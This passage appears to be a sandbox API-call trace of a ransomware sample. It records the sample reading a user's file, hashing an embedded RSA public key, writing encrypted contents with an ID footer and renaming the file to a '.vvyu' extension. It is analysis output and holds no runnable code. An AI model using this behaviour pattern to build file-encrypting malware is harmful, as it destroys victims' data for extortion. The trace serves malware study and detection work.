dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.571] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=12705) returned 1 [0192.571] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.574] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x317b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.574] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.577] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.577] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x31a1, lpOverlapped=0x0) returned 1 [0192.578] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.578] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.578] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.578] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.579] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.579] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.579] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.579] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.579] GetLastError () returned 0x0 [0192.579] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.579] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.580] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.580] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.580] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x31a0) returned 0x2e9ea68 [0192.580] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e952f0 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95338 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.581] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea1c10 [0192.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1c10 | out: hHeap=0x620000) returned 1 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93648 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93630 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0192.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.584] GetCurrentThreadId () returned 0x66c [0192.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e5c0 [0192.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.585] GetCurrentThreadId () returned 0x66c [0192.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93648 [0192.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936a8 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936c0 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93660 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93630 [0192.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea1c10 [0192.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea1e20 [0192.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0192.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea2038 [0192.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e20 | out: hHeap=0x620000) returned 1 [0192.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2038 | out: hHeap=0x620000) returned 1 [0192.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95338 | out: hHeap=0x620000) returned 1 [0192.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1c10 | out: hHeap=0x620000) returned 1 [0192.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.598] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ea68*, nNumberOfBytesToWrite=0x319c, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e9ea68*, lpNumberOfBytesWritten=0x312fb14*=0x319c, lpOverlapped=0x0) returned 1 [0192.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.598] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x31a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.598] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.600] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.601] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.601] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.601] CloseHandle (hObject=0x568) returned 1 [0192.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e9ea68 [0192.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.602] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\K3t8MlfEa.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\k3t8mlfea.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\K3t8MlfEa.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\k3t8mlfea.mp3.vvyu")) returned 1 [0192.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.604] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.607] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: 